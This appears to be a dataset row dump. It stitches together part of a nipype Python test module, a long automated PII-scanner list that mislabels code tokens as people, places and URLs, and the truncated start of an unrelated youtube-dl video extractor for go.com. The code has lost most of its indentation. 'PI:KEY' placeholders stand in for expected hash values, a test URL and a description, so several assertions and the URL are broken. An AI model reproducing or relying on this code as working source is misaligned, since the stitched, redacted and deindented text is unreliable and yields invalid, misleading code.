tmpd, nme, ext = split_filename(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
class spec2(nib.CommandLineInputSpec):
moo = nib.File(name_source=['doo'], hash_files=False, argstr="%s",
position=2)
doo = nib.File(exists=True, argstr="%s", position=1)
goo = traits.Int(argstr="%d", position=4)
poo = nib.File(name_source=['goo'], hash_files=False, argstr="%s", position=3)
class TestName(nib.CommandLine):
_cmd = "mycommand"
input_spec = spec2
testobj = TestName()
testobj.inputs.doo = tmp_infile
testobj.inputs.goo = 99
yield assert_true, '%s_generated' % nme in testobj.cmdline
testobj.inputs.moo = "my_%s_template"
yield assert_true, 'my_%s_template' % nme in testobj.cmdline
os.chdir(pwd)
teardown_file(tmpd)
def test_chained_namesource():
tmp_infile = setup_file()
tmpd, nme, ext = split_filename(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
class spec2(nib.CommandLineInputSpec):
doo = nib.File(exists=True, argstr="%s", position=1)
moo = nib.File(name_source=['doo'], hash_files=False, argstr="%s",
position=2, name_template='%s_mootpl')
poo = nib.File(name_source=['moo'], hash_files=False,
argstr="%s", position=3)
class TestName(nib.CommandLine):
_cmd = "mycommand"
input_spec = spec2
testobj = TestName()
testobj.inputs.doo = tmp_infile
res = testobj.cmdline
yield assert_true, '%s' % tmp_infile in res
yield assert_true, '%s_mootpl ' % nme in res
yield assert_true, '%s_mootpl_generated' % nme in res
os.chdir(pwd)
teardown_file(tmpd)
def test_cycle_namesource1():
tmp_infile = setup_file()
tmpd, nme, ext = split_filename(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
class spec3(nib.CommandLineInputSpec):
moo = nib.File(name_source=['doo'], hash_files=False, argstr="%s",
position=1, name_template='%s_mootpl')
poo = nib.File(name_source=['moo'], hash_files=False,
argstr="%s", position=2)
doo = nib.File(name_source=['poo'], hash_files=False,
argstr="%s", position=3)
class TestCycle(nib.CommandLine):
_cmd = "mycommand"
input_spec = spec3
# Check that an exception is raised
to0 = TestCycle()
not_raised = True
try:
to0.cmdline
except nib.NipypeInterfaceError:
not_raised = False
yield assert_false, not_raised
os.chdir(pwd)
teardown_file(tmpd)
def test_cycle_namesource2():
tmp_infile = setup_file()
tmpd, nme, ext = split_filename(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
class spec3(nib.CommandLineInputSpec):
moo = nib.File(name_source=['doo'], hash_files=False, argstr="%s",
position=1, name_template='%s_mootpl')
poo = nib.File(name_source=['moo'], hash_files=False,
argstr="%s", position=2)
doo = nib.File(name_source=['poo'], hash_files=False,
argstr="%s", position=3)
class TestCycle(nib.CommandLine):
_cmd = "mycommand"
input_spec = spec3
# Check that loop can be broken by setting one of the inputs
to1 = TestCycle()
to1.inputs.poo = tmp_infile
    not_raised = True
    res = ''  # keep res defined even when cmdline generation raises
    try:
        res = to1.cmdline
    except nib.NipypeInterfaceError:
        not_raised = False
    print(res)
yield assert_true, not_raised
yield assert_true, '%s' % tmp_infile in res
yield assert_true, '%s_generated' % nme in res
yield assert_true, '%s_generated_mootpl' % nme in res
os.chdir(pwd)
teardown_file(tmpd)
def checknose():
"""check version of nose for known incompatability"""
mod = __import__('nose')
if mod.__versioninfo__[1] <= 11:
return 0
else:
return 1
@skipif(checknose)
def test_TraitedSpec_withFile():
tmp_infile = setup_file()
tmpd, nme = os.path.split(tmp_infile)
yield assert_true, os.path.exists(tmp_infile)
class spec2(nib.TraitedSpec):
moo = nib.File(exists=True)
doo = nib.traits.List(nib.File(exists=True))
infields = spec2(moo=tmp_infile, doo=[tmp_infile])
hashval = infields.get_hashval(hash_method='content')
yield assert_equal, hashval[1], 'PI:KEY'
teardown_file(tmpd)
@skipif(checknose)
def test_TraitedSpec_withNoFileHashing():
tmp_infile = setup_file()
tmpd, nme = os.path.split(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
yield assert_true, os.path.exists(tmp_infile)
class spec2(nib.TraitedSpec):
moo = nib.File(exists=True, hash_files=False)
doo = nib.traits.List(nib.File(exists=True))
infields = spec2(moo=nme, doo=[tmp_infile])
hashval = infields.get_hashval(hash_method='content')
yield assert_equal, hashval[1], 'PI:KEY'
class spec3(nib.TraitedSpec):
moo = nib.File(exists=True, name_source="doo")
doo = nib.traits.List(nib.File(exists=True))
infields = spec3(moo=nme, doo=[tmp_infile])
hashval1 = infields.get_hashval(hash_method='content')
class spec4(nib.TraitedSpec):
moo = nib.File(exists=True)
doo = nib.traits.List(nib.File(exists=True))
infields = spec4(moo=nme, doo=[tmp_infile])
hashval2 = infields.get_hashval(hash_method='content')
yield assert_not_equal, hashval1[1], hashval2[1]
os.chdir(pwd)
teardown_file(tmpd)
def test_Interface():
yield assert_equal, nib.Interface.input_spec, None
yield assert_equal, nib.Interface.output_spec, None
yield assert_raises, NotImplementedError, nib.Interface
yield assert_raises, NotImplementedError, nib.Interface.help
yield assert_raises, NotImplementedError, nib.Interface._inputs_help
yield assert_raises, NotImplementedError, nib.Interface._outputs_help
yield assert_raises, NotImplementedError, nib.Interface._outputs
class DerivedInterface(nib.Interface):
def __init__(self):
pass
nif = DerivedInterface()
yield assert_raises, NotImplementedError, nif.run
yield assert_raises, NotImplementedError, nif.aggregate_outputs
yield assert_raises, NotImplementedError, nif._list_outputs
yield assert_raises, NotImplementedError, nif._get_filecopy_info
def test_BaseInterface():
yield assert_equal, nib.BaseInterface.help(), None
yield assert_equal, nib.BaseInterface._get_filecopy_info(), []
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
goo = nib.traits.Int(desc='a random int', mandatory=True)
moo = nib.traits.Int(desc='a random int', mandatory=False)
hoo = nib.traits.Int(desc='a random int', usedefault=True)
zoo = nib.File(desc='a file', copyfile=False)
woo = nib.File(desc='a file', copyfile=True)
class OutputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
class DerivedInterface(nib.BaseInterface):
input_spec = InputSpec
yield assert_equal, DerivedInterface.help(), None
yield assert_true, 'moo' in ''.join(DerivedInterface._inputs_help())
yield assert_equal, DerivedInterface()._outputs(), None
yield assert_equal, DerivedInterface._get_filecopy_info()[0]['key'], 'woo'
yield assert_true, DerivedInterface._get_filecopy_info()[0]['copy']
yield assert_equal, DerivedInterface._get_filecopy_info()[1]['key'], 'zoo'
yield assert_false, DerivedInterface._get_filecopy_info()[1]['copy']
yield assert_equal, DerivedInterface().inputs.foo, Undefined
yield assert_raises, ValueError, DerivedInterface()._check_mandatory_inputs
yield assert_equal, DerivedInterface(goo=1)._check_mandatory_inputs(), None
yield assert_raises, ValueError, DerivedInterface().run
yield assert_raises, NotImplementedError, DerivedInterface(goo=1).run
class DerivedInterface2(DerivedInterface):
output_spec = OutputSpec
def _run_interface(self, runtime):
return runtime
yield assert_equal, DerivedInterface2.help(), None
yield assert_equal, DerivedInterface2()._outputs().foo, Undefined
yield assert_raises, NotImplementedError, DerivedInterface2(goo=1).run
nib.BaseInterface.input_spec = None
yield assert_raises, Exception, nib.BaseInterface
def test_BaseInterface_load_save_inputs():
tmp_dir = tempfile.mkdtemp()
tmp_json = os.path.join(tmp_dir, 'settings.json')
class InputSpec(nib.TraitedSpec):
input1 = nib.traits.Int()
input2 = nib.traits.Float()
input3 = nib.traits.Bool()
input4 = nib.traits.Str()
class DerivedInterface(nib.BaseInterface):
input_spec = InputSpec
def __init__(self, **inputs):
super(DerivedInterface, self).__init__(**inputs)
inputs_dict = {'input1': 12, 'input3': True,
'input4': 'some string'}
bif = DerivedInterface(**inputs_dict)
bif.save_inputs_to_json(tmp_json)
bif2 = DerivedInterface()
bif2.load_inputs_from_json(tmp_json)
yield assert_equal, bif2.inputs.get_traitsfree(), inputs_dict
bif3 = DerivedInterface(from_file=tmp_json)
yield assert_equal, bif3.inputs.get_traitsfree(), inputs_dict
inputs_dict2 = inputs_dict.copy()
inputs_dict2.update({'input4': 'some other string'})
bif4 = DerivedInterface(from_file=tmp_json, input4=inputs_dict2['input4'])
yield assert_equal, bif4.inputs.get_traitsfree(), inputs_dict2
bif5 = DerivedInterface(input4=inputs_dict2['input4'])
bif5.load_inputs_from_json(tmp_json, overwrite=False)
yield assert_equal, bif5.inputs.get_traitsfree(), inputs_dict2
bif6 = DerivedInterface(input4=inputs_dict2['input4'])
bif6.load_inputs_from_json(tmp_json)
yield assert_equal, bif6.inputs.get_traitsfree(), inputs_dict
# test get hashval in a complex interface
from nipype.interfaces.ants import Registration
settings = example_data(example_data('smri_ants_registration_settings.json'))
with open(settings) as setf:
data_dict = json.load(setf)
tsthash = Registration()
tsthash.load_inputs_from_json(settings)
yield assert_equal, {}, check_dict(data_dict, tsthash.inputs.get_traitsfree())
tsthash2 = Registration(from_file=settings)
yield assert_equal, {}, check_dict(data_dict, tsthash2.inputs.get_traitsfree())
_, hashvalue = tsthash.inputs.get_hashval(hash_method='timestamp')
yield assert_equal, 'ec5755e07287e04a4b409e03b77a517c', hashvalue
def test_input_version():
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
obj = DerivedInterface1()
yield assert_not_raises, obj._check_version_requirements, obj.inputs
config.set('execution', 'stop_on_unknown_version', True)
yield assert_raises, Exception, obj._check_version_requirements, obj.inputs
config.set_default_config()
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
_version = '0.8'
obj = DerivedInterface1()
obj.inputs.foo = 1
yield assert_raises, Exception, obj._check_version_requirements
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
_version = '0.10'
obj = DerivedInterface1()
yield assert_not_raises, obj._check_version_requirements, obj.inputs
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
_version = '0.9'
obj = DerivedInterface1()
obj.inputs.foo = 1
not_raised = True
yield assert_not_raises, obj._check_version_requirements, obj.inputs
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', max_ver='0.7')
class DerivedInterface2(nib.BaseInterface):
input_spec = InputSpec
_version = '0.8'
obj = DerivedInterface2()
obj.inputs.foo = 1
yield assert_raises, Exception, obj._check_version_requirements
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', max_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
_version = '0.9'
obj = DerivedInterface1()
obj.inputs.foo = 1
not_raised = True
yield assert_not_raises, obj._check_version_requirements, obj.inputs
def test_output_version():
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
class OutputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
output_spec = OutputSpec
_version = '0.10'
obj = DerivedInterface1()
yield assert_equal, obj._check_version_requirements(obj._outputs()), []
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
class OutputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.11')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
output_spec = OutputSpec
_version = '0.10'
obj = DerivedInterface1()
yield assert_equal, obj._check_version_requirements(obj._outputs()), ['foo']
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
class OutputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.11')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
output_spec = OutputSpec
_version = '0.10'
def _run_interface(self, runtime):
return runtime
def _list_outputs(self):
return {'foo': 1}
obj = DerivedInterface1()
yield assert_raises, KeyError, obj.run
def test_Commandline():
yield assert_raises, Exception, nib.CommandLine
ci = nib.CommandLine(command='which')
yield assert_equal, ci.cmd, 'which'
yield assert_equal, ci.inputs.args, Undefined
ci2 = nib.CommandLine(command='which', args='ls')
yield assert_equal, ci2.cmdline, 'which ls'
ci3 = nib.CommandLine(command='echo')
ci3.inputs.environ = {'MYENV': 'foo'}
res = ci3.run()
yield assert_equal, res.runtime.environ['MYENV'], 'foo'
yield assert_equal, res.outputs, None
class CommandLineInputSpec1(nib.CommandLineInputSpec):
foo = nib.Str(argstr='%s', desc='a str')
goo = nib.traits.Bool(argstr='-g', desc='a bool', position=0)
hoo = nib.traits.List(argstr='-l %s', desc='a list')
moo = nib.traits.List(argstr='-i %d...', desc='a repeated list',
position=-1)
noo = nib.traits.Int(argstr='-x %d', desc='an int')
roo = nib.traits.Str(desc='not on command line')
soo = nib.traits.Bool(argstr="-soo")
nib.CommandLine.input_spec = CommandLineInputSpec1
ci4 = nib.CommandLine(command='cmd')
ci4.inputs.foo = 'foo'
ci4.inputs.goo = True
ci4.inputs.hoo = ['a', 'b']
ci4.inputs.moo = [1, 2, 3]
ci4.inputs.noo = 0
ci4.inputs.roo = 'hello'
ci4.inputs.soo = False
cmd = ci4._parse_inputs()
yield assert_equal, cmd[0], '-g'
yield assert_equal, cmd[-1], '-i 1 -i 2 -i 3'
yield assert_true, 'hello' not in ' '.join(cmd)
yield assert_true, '-soo' not in ' '.join(cmd)
ci4.inputs.soo = True
cmd = ci4._parse_inputs()
yield assert_true, '-soo' in ' '.join(cmd)
class CommandLineInputSpec2(nib.CommandLineInputSpec):
foo = nib.File(argstr='%s', desc='a str', genfile=True)
nib.CommandLine.input_spec = CommandLineInputSpec2
ci5 = nib.CommandLine(command='cmd')
yield assert_raises, NotImplementedError, ci5._parse_inputs
class DerivedClass(nib.CommandLine):
input_spec = CommandLineInputSpec2
def _gen_filename(self, name):
return 'filename'
ci6 = DerivedClass(command='cmd')
yield assert_equal, ci6._parse_inputs()[0], 'filename'
nib.CommandLine.input_spec = nib.CommandLineInputSpec
def test_Commandline_environ():
from nipype import config
config.set_default_config()
ci3 = nib.CommandLine(command='echo')
res = ci3.run()
yield assert_equal, res.runtime.environ['DISPLAY'], ':1'
config.set('execution', 'display_variable', ':3')
res = ci3.run()
yield assert_false, 'DISPLAY' in ci3.inputs.environ
yield assert_equal, res.runtime.environ['DISPLAY'], ':3'
ci3.inputs.environ = {'DISPLAY': ':2'}
res = ci3.run()
yield assert_equal, res.runtime.environ['DISPLAY'], ':2'
def test_CommandLine_output():
tmp_infile = setup_file()
tmpd, name = os.path.split(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
yield assert_true, os.path.exists(tmp_infile)
ci = nib.CommandLine(command='ls -l')
ci.inputs.terminal_output = 'allatonce'
res = ci.run()
yield assert_equal, res.runtime.merged, ''
yield assert_true, name in res.runtime.stdout
ci = nib.CommandLine(command='ls -l')
ci.inputs.terminal_output = 'file'
res = ci.run()
yield assert_true, 'stdout.nipype' in res.runtime.stdout
yield assert_true, isinstance(res.runtime.stdout, (str, bytes))
ci = nib.CommandLine(command='ls -l')
ci.inputs.terminal_output = 'none'
res = ci.run()
yield assert_equal, res.runtime.stdout, ''
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_true, 'stdout.nipype' in res.runtime.stdout
os.chdir(pwd)
teardown_file(tmpd)
def test_global_CommandLine_output():
tmp_infile = setup_file()
tmpd, name = os.path.split(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_true, name in res.runtime.stdout
yield assert_true, os.path.exists(tmp_infile)
nib.CommandLine.set_default_terminal_output('allatonce')
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_equal, res.runtime.merged, ''
yield assert_true, name in res.runtime.stdout
nib.CommandLine.set_default_terminal_output('file')
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_true, 'stdout.nipype' in res.runtime.stdout
nib.CommandLine.set_default_terminal_output('none')
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_equal, res.runtime.stdout, ''
os.chdir(pwd)
teardown_file(tmpd)
def assert_not_raises(fn, *args, **kwargs):
fn(*args, **kwargs)
return True
def check_dict(ref_dict, tst_dict):
"""Compare dictionaries of inputs and and those loaded from json files"""
def to_list(x):
if isinstance(x, tuple):
x = list(x)
if isinstance(x, list):
for i, xel in enumerate(x):
x[i] = to_list(xel)
return x
failed_dict = {}
for key, value in list(ref_dict.items()):
newval = to_list(tst_dict[key])
if newval != value:
failed_dict[key] = (value, newval)
return failed_dict
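
# Hedged example for check_dict: values loaded back from json turn tuples into
# lists, so to_list normalises the tested value before comparing.
def test_check_dict():
    ref = {'a': 1, 'b': [1, 2]}   # e.g. values loaded from a json settings file
    tst = {'a': 1, 'b': (1, 2)}   # e.g. traits values that use tuples
    yield assert_equal, check_dict(ref, tst), {}
    yield assert_equal, check_dict({'a': 1}, {'a': 2}), {'a': (1, 2)}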
| 26,974 | [['UK_NHS', '0000000000'], ['PERSON', 'ts=4 sw=4'], ['PERSON', 'simplejson'], ['PERSON', 'Bunch(b=2'], ['LOCATION', 'c=3'], ['LOCATION', 'b=2'], ['PERSON', 'json'], ['PERSON', 'json'], ['LOCATION', 'os.path.join(tmp_dir'], ['PERSON', 'teardown_file(tmp_dir'], ['NRP', 'shutil.rmtree(tmp_dir'], ['LOCATION', 'spec().goo'], ['PERSON', 'BaseTraitedSpec'], ['DATE_TIME', "desc='bar"], ['LOCATION', 'myif.inputs.kung'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'Int'], ['PERSON', 'UserWarning'], ['PERSON', 'Int'], ['PERSON', 'my_%s_template'], ['PERSON', 'testobj'], ['LOCATION', 's_mootpl'], ['LOCATION', 'test_cycle_namesource2'], ['PERSON', '=tmp_infile'], ['PERSON', 'hashval1'], ['PERSON', 'nif'], ['LOCATION', 'nib.BaseInterface.help'], ['PERSON', 'tmp_json = os.path.join(tmp_dir'], ['PERSON', 'Int'], ['PERSON', 'Bool'], ['PERSON', 'input4 = nib.traits'], ['PERSON', 'input4'], ['PERSON', 'input4'], ['PERSON', 'setf'], ['LOCATION', 'tsthash.inputs.get_traitsfree'], ['LOCATION', 'tsthash2.inputs.get_traitsfree'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['NRP', "desc='a"], ['LOCATION', "desc='an"], ['PERSON', 'roo = nib.traits'], ['PERSON', "ci6 = DerivedClass(command='cmd'"], ['LOCATION', 'test_CommandLine_output'], ['PERSON', 'fn(*args'], ['LOCATION', 'json'], ['PERSON', 'to_list(xel'], ['URL', 'library.in'], ['URL', 'nipype.interfaces.ba'], ['URL', 'nipype.utils.fi'], ['URL', 'nipype.interfaces.ba'], ['URL', 'traits.testing.no'], ['URL', 'b.ge'], ['URL', 'b.ge'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'nib.md'], ['URL', 'fp.re'], ['URL', 'tempfile.mk'], ['URL', 'os.path.jo'], ['URL', 'nib.Tr'], ['URL', 'nib.Tr'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.traits.Tr'], ['URL', 'infields.ge'], ['URL', 'nib.Ba'], ['URL', 'a.ad'], ['URL', 'nib.traits.Int'], ['URL', 'a.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'myif.in'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.in'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.in'], ['URL', 'myif.in'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'instance.fo'], ['URL', 'nib.Tr'], ['URL', 'w1.me'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'instance.fo'], ['URL', 'nib.Tr'], ['URL', 'instance.fo'], ['URL', 'instance.ba'], ['URL', 'w1.me'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'traits.Int'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'testobj.inputs.do'], ['URL', 'testobj.in'], ['URL', 'testobj.cm'], ['URL', 'testobj.inputs.mo'], ['URL', 'testobj.cm'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], 
['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'testobj.inputs.do'], ['URL', 'testobj.cm'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'to0.cm'], ['URL', 'nib.Ni'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'to1.in'], ['URL', 'to1.cm'], ['URL', 'nib.Ni'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'os.ch'], ['URL', 'nib.Interface.in'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nif.ru'], ['URL', 'nif.ag'], ['URL', 'nib.Ba'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', '.inputs.fo'], ['URL', 'nib.BaseInterface.in'], ['URL', 'nib.Ba'], ['URL', 'tempfile.mk'], ['URL', 'os.path.jo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.traits.St'], ['URL', 'nib.Ba'], ['URL', 'bif.sa'], ['URL', 'bif2.inputs.ge'], ['URL', 'bif3.inputs.ge'], ['URL', 'dict.co'], ['URL', 'bif4.inputs.ge'], ['URL', 'bif5.inputs.ge'], ['URL', 'bif6.inputs.ge'], ['URL', 'nipype.interfaces.an'], ['URL', 'tsthash.inputs.ge'], ['URL', 'tsthash2.inputs.ge'], ['URL', 'tsthash.inputs.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.in'], ['URL', 'config.se'], ['URL', 'obj.in'], ['URL', 'config.se'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.ru'], ['URL', 'nib.Com'], ['URL', 'nib.Com'], ['URL', 'ci.cm'], ['URL', 'ci.inputs.ar'], ['URL', 'nib.Com'], ['URL', 'ci2.cm'], ['URL', 'nib.Com'], ['URL', 'ci3.in'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'nib.Com'], ['URL', 'nib.St'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.traits.Li'], ['URL', 'nib.traits.Li'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.St'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 
'ci4.inputs.fo'], ['URL', 'ci4.in'], ['URL', 'ci4.in'], ['URL', 'ci4.inputs.mo'], ['URL', 'ci4.inputs.no'], ['URL', 'ci4.inputs.ro'], ['URL', 'ci4.inputs.so'], ['URL', 'ci4.inputs.so'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 'nib.Com'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 'config.se'], ['URL', 'nib.Com'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'config.se'], ['URL', 'ci3.ru'], ['URL', 'ci3.in'], ['URL', 'res.ru'], ['URL', 'ci3.in'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'res.runtime.me'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'os.pa'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.me'], ['URL', 'res.runtime.st'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'os.ch'], ['URL', 'dict.it']] |
53 | # coding: utf-8
from __future__ import unicode_literals
import re
from .adobepass import AdobePassIE
from ..utils import (
int_or_none,
determine_ext,
parse_age_limit,
urlencode_postdata,
ExtractorError,
)
class GoIE(AdobePassIE):
_SITE_INFO = {
'abc': {
'brand': '001',
'requestor_id': 'ABC',
},
'freeform': {
'brand': '002',
'requestor_id': 'ABCFamily',
},
'watchdisneychannel': {
'brand': '004',
'requestor_id': 'Disney',
},
'watchdisneyjunior': {
'brand': '008',
'requestor_id': 'DisneyJunior',
},
'watchdisneyxd': {
'brand': '009',
'requestor_id': 'DisneyXD',
}
}
_VALID_URL = r'https?://(?:(?P<sub_domain>%s)\.)?go\.com/(?:[^/]+/)*(?:vdka(?P<id>\w+)|season-\d+/\d+-(?P<display_id>[^/?#]+))' % '|'.join(_SITE_INFO.keys())
_TESTS = [{
'url': 'http://abc.go.PI:KEY',
'info_dict': {
'id': '0_g86w5onx',
'ext': 'mp4',
'title': 'Sneak Peek: Language Arts',
'description': 'PI:KEY',
},
'params': {
# m3u8 download
'skip_download': True,
},
}, {
'url': 'http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601',
'only_matching': True,
}]
def _real_extract(self, url):
